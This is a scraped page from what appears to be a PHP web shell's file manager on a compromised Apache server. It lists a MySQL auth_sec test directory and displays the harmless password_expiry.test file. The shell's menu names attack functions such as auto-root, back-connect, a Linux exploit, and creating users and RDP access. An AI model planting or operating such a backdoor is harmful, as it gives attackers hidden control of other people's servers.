Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 52.14.238.102
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
mysql /
mysql-test /
suite /
auth_sec /
t /
[ HOME SHELL ]
Name
Size
Permission
Action
access_credential_control-mast...
170
B
-rw-r--r--
access_credential_control.test
27.33
KB
-rw-r--r--
cert_verify.test
2.17
KB
-rw-r--r--
early_plugin_load-master.opt
23
B
-rw-r--r--
early_plugin_load.test
1.17
KB
-rw-r--r--
install_keyring_file-master.op...
73
B
-rw-r--r--
install_keyring_file.test
1.21
KB
-rw-r--r--
key_rotation.test
622
B
-rw-r--r--
key_rotation_qa-master.opt
20
B
-rw-r--r--
key_rotation_qa.test
9.02
KB
-rw-r--r--
key_value_auth-master.opt
170
B
-rw-r--r--
key_value_auth.test
23.04
KB
-rw-r--r--
keyring_file_data-master.opt
93
B
-rw-r--r--
keyring_file_data.test
1.18
KB
-rw-r--r--
keyring_file_data_qa-master.op...
73
B
-rw-r--r--
keyring_file_data_qa.test
2.84
KB
-rw-r--r--
keyring_udf-master.opt
37
B
-rw-r--r--
keyring_udf.test
5.2
KB
-rw-r--r--
multiple_plugins-master.opt
225
B
-rw-r--r--
multiple_plugins.test
505
B
-rw-r--r--
mysql_native_plugin.test
24.09
KB
-rw-r--r--
mysql_no_login-master.opt
20
B
-rw-r--r--
mysql_no_login.test
4.56
KB
-rw-r--r--
mysql_protocol_types.test
6.42
KB
-rw-r--r--
mysql_protocol_types_windows-m...
50
B
-rw-r--r--
mysql_protocol_types_windows.t...
3.38
KB
-rw-r--r--
mysql_sha256_plugin-master.opt
170
B
-rw-r--r--
mysql_sha256_plugin.test
21.21
KB
-rw-r--r--
mysql_ssl_connection-master.op...
35
B
-rw-r--r--
mysql_ssl_connection.test
418
B
-rw-r--r--
mysql_ssl_rsa_setup.test
12.05
KB
-rw-r--r--
named_pipe_ssl-master.opt
26
B
-rw-r--r--
named_pipe_ssl.test
959
B
-rw-r--r--
openssl_cert_generation-master...
39
B
-rw-r--r--
openssl_cert_generation.test
18.35
KB
-rw-r--r--
openssl_cert_generation_debug....
3.91
KB
-rw-r--r--
openssl_cert_generation_subjec...
39
B
-rw-r--r--
openssl_cert_generation_subjec...
3.37
KB
-rw-r--r--
openssl_cert_validity-master.o...
67
B
-rw-r--r--
openssl_cert_validity.test
590
B
-rw-r--r--
openssl_skip_cert_generation-m...
67
B
-rw-r--r--
openssl_skip_cert_generation.t...
2.46
KB
-rw-r--r--
password_expired-master.opt
170
B
-rw-r--r--
password_expired.test
22.89
KB
-rw-r--r--
password_expiry.test
7.69
KB
-rw-r--r--
require_secure_transport.test
3.15
KB
-rw-r--r--
require_secure_transport_windo...
50
B
-rw-r--r--
require_secure_transport_windo...
5.81
KB
-rw-r--r--
secure_file_priv_error.test
1.61
KB
-rw-r--r--
secure_file_priv_null-master.o...
24
B
-rw-r--r--
secure_file_priv_null.test
1.47
KB
-rw-r--r--
secure_file_priv_warnings-mast...
22
B
-rw-r--r--
secure_file_priv_warnings.test
2.18
KB
-rw-r--r--
secure_file_priv_warnings_not_...
1.22
KB
-rw-r--r--
secure_file_priv_warnings_win....
1.45
KB
-rw-r--r--
server_withssl_client_withouts...
405
B
-rw-r--r--
server_withssl_client_withouts...
11.95
KB
-rw-r--r--
server_withssl_client_withssl-...
405
B
-rw-r--r--
server_withssl_client_withssl....
15.89
KB
-rw-r--r--
set_password_deprecated.test
2.67
KB
-rw-r--r--
ssl_auto_detect-master.opt
124
B
-rw-r--r--
ssl_auto_detect.test
5.22
KB
-rw-r--r--
ssl_auto_detect_openssl-master...
118
B
-rw-r--r--
ssl_auto_detect_openssl.test
2.62
KB
-rw-r--r--
ssl_mode.test
9.47
KB
-rw-r--r--
tls.test
4.45
KB
-rw-r--r--
tls12_tls1.test
2.33
KB
-rw-r--r--
wrong_keyring_file_data-master...
90
B
-rw-r--r--
wrong_keyring_file_data.test
806
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : password_expiry.test
############################################################# # Purpose : To check authentication cases for WL#7131 # Author : Prabeen Pradhan # Date : 25th Feb 2014 ############################################################# # Grant tests not performed with embedded server -- source include/not_embedded.inc --echo ###################################################### --echo Authentication cases --echo ###################################################### --echo #### Honouring the value of password_lifetime, below test checks if --echo #### password expiry is working when expiry date passed. Use SET PASSWORD --echo #### for an expired user which honours the value of password_lifetime CREATE USER u1 IDENTIFIED by 'u1'; UPDATE mysql.user SET password_last_changed=DATE_SUB(NOW(), INTERVAL 3 DAY), password_lifetime=2 WHERE user='u1'; FLUSH PRIVILEGES; --echo #### Connection with u1 will succeed in sand box mode, but no statements --echo #### can be executed except SET PASSWORD connect (conn_u1,localhost,u1,u1,); --echo # Setting variables should work --error 1820 SELECT 'Password_Expired_SandBoxMode_Test'; SET PASSWORD = 'u1_new'; SELECT 'Normal_Statement_Can_Be_Executed'; disconnect conn_u1; connect (conn_root,localhost,root,,); SELECT password_expired FROM mysql.user WHERE user='u1'; DROP USER u1; --echo #### Honouring the value of password_lifetime, check if password expiry --echo #### is working when password is active. CREATE USER u1 IDENTIFIED by 'u1'; UPDATE mysql.user SET password_last_changed=DATE_SUB(NOW(), INTERVAL 2 DAY), password_lifetime=3 WHERE user='u1'; FLUSH PRIVILEGES; --echo #### Connection will succeed, user should be able to execute statements connect (conn_u1,localhost,u1,u1,); --echo # Setting variables should work SET old_passwords=0; SELECT 'Normal_Statement_Can_Be_Executed'; disconnect conn_u1; connection conn_root; SELECT password_expired FROM mysql.user WHERE user='u1'; DROP USER u1; --echo #### Set the value of password_lifetime to 0 and check its validity. CREATE USER u1 IDENTIFIED by 'u1'; UPDATE mysql.user SET password_last_changed=DATE_SUB(NOW(), INTERVAL 2 DAY), password_lifetime=0 WHERE user='u1'; FLUSH PRIVILEGES; --echo #### Connection will succeed, user should be able to execute statements connect (conn_u1,localhost,u1,u1,); --echo # Setting variables should work SET old_passwords=0; SELECT 'Normal_Statement_Can_Be_Executed'; disconnect conn_u1; connection conn_root; SELECT password_expired FROM mysql.user WHERE user='u1'; DROP USER u1; --echo #### Honouring the value of default_password_lifetime, check if password --echo #### expiry is working when password is expired. CREATE USER u1 IDENTIFIED by 'u1'; UPDATE mysql.user SET password_last_changed=DATE_SUB(NOW(), INTERVAL 3 DAY), password_lifetime=null WHERE user='u1'; SET GLOBAL default_password_lifetime = 2; FLUSH PRIVILEGES; --echo #### Connection will succeed, user should be able to execute statements connect (conn_u1,localhost,u1,u1,); --error 1820 SELECT 'Password_Expired_SandBoxMode_Test'; disconnect conn_u1; connection conn_root; SELECT password_expired FROM mysql.user WHERE user='u1'; DROP USER u1; --echo #### Honouring the value of default_password_lifetime, check if --echo #### password expiry is working when password is expired. CREATE USER u1 IDENTIFIED by 'u1'; UPDATE mysql.user SET password_last_changed=DATE_SUB(NOW(), INTERVAL 2 DAY), password_lifetime=null WHERE user='u1'; SET GLOBAL default_password_lifetime = 3; FLUSH PRIVILEGES; --echo #### Connection will succeed, user should be able to execute statements connect (conn_u1,localhost,u1,u1,); --echo # Setting variables should work SET old_passwords=0; SELECT 'Normal_Statement_Can_Be_Executed'; disconnect conn_u1; connection conn_root; SELECT password_expired FROM mysql.user WHERE user='u1'; DROP USER u1; --echo #### Check if NULL value can be set to default_password_lifetime --error 1232 SET GLOBAL default_password_lifetime = null; --echo #### Ensure that existing sessions are not disturbed due to change in --echo #### global value of default_password_lifetime. CREATE USER u1 IDENTIFIED by 'u1'; --echo #### Connection will succeed, user should be able to execute statements connect (conn_u1,localhost,u1,u1,); --echo # Setting variables should work SET old_passwords=0; SELECT 'Normal_Statement_Can_Be_Executed'; connection conn_root; UPDATE mysql.user SET password_last_changed=DATE_SUB(NOW(), INTERVAL 3 DAY), password_lifetime=null WHERE user='u1'; SET GLOBAL default_password_lifetime = 2; FLUSH PRIVILEGES; connection conn_u1; --echo # Setting variables should work SET old_passwords=0; SELECT 'Normal_Statement_Can_Be_Executed'; disconnect conn_u1; connection conn_root; SELECT password_expired FROM mysql.user WHERE user='u1'; DROP USER u1; --echo #### Use SET PASSWORD for an expired user which honours the value of --echo #### variable default_password_lifetime. CREATE USER u1 IDENTIFIED by 'u1'; UPDATE mysql.user SET password_last_changed=DATE_SUB(NOW(), INTERVAL 3 DAY), password_lifetime=null WHERE user='u1'; SET GLOBAL default_password_lifetime = 2; FLUSH PRIVILEGES; --echo #### Connection will succeed in sand box mode, --echo #### but no statements can be executed except SET PASSWORD connect (conn_u1,localhost,u1,u1,); --error 1820 SELECT 'Password_Expired_SandBoxMode_Test'; SET PASSWORD = 'u1_new'; --echo # Setting variables should work SET old_passwords=0; SELECT 'Normal_Statement_Can_Be_Executed'; disconnect conn_u1; connection conn_root; SELECT password_expired FROM mysql.user WHERE user='u1'; DROP USER u1; --echo #### For an expired user where password_expired is Y, ensure that it --echo #### does not execute anything except SET PASSWORD. CREATE USER u1 IDENTIFIED by 'u1'; UPDATE mysql.user SET password_expired='Y' WHERE user='u1'; FLUSH PRIVILEGES; --echo #Below statement should not affect the value of password_expired column ALTER USER 'u1' PASSWORD EXPIRE INTERVAL 5 DAY; SELECT password_expired FROM mysql.user WHERE user='u1'; DROP USER u1; --echo #### Check if SET PASSWORD resets the value of column --echo #### password_expired to N when it is Y. CREATE USER u1 IDENTIFIED by 'u1'; ALTER USER 'u1' PASSWORD EXPIRE; --echo #Expiry status of u1 should be Y SELECT password_expired FROM mysql.user WHERE user='u1'; connect (conn_u1,localhost,u1,u1,); SET PASSWORD = 'u1_new'; disconnect conn_u1; connection conn_root; --echo #Expiry status of u1 should be N SELECT password_expired FROM mysql.user WHERE user='u1'; DROP USER u1; --echo #### Try updating the newly introduced columns and try setting the --echo #### global variable default_password_lifetime with an user having --echo #### insufficient privilege. CREATE USER u1 IDENTIFIED by 'u1'; connect (conn_u1,localhost,u1,u1,); --error 1227 SET GLOBAL default_password_lifetime = 2; --error 1142 UPDATE mysql.user SET password_last_changed=DATE_SUB(NOW(), INTERVAL 3 DAY), password_lifetime=null WHERE user='u1'; disconnect conn_u1; connection conn_root; DROP USER u1; --echo #### One year password expiration check CREATE USER u1 IDENTIFIED by 'u1'; UPDATE mysql.user SET password_last_changed=DATE_SUB(NOW(), INTERVAL 361 DAY), password_lifetime=null WHERE user='u1'; SET GLOBAL default_password_lifetime = 360; FLUSH PRIVILEGES; --echo # Connection will succeed in sand box mode, --echo # but no statements can be executed except SET PASSWORD connect (conn_u1,localhost,u1,u1,); --error 1820 SELECT 'Password_Expired_SandBoxMode_Test'; SET PASSWORD = 'u1_new'; --echo # Setting variables should work SET old_passwords=0; SELECT 'Normal_Statement_Can_Be_Executed'; disconnect conn_u1; connection conn_root; SELECT password_expired FROM mysql.user WHERE user='u1'; DROP USER u1; --echo #### Cleanup statements connection conn_root; SET GLOBAL default_password_lifetime = default; disconnect conn_root;
Close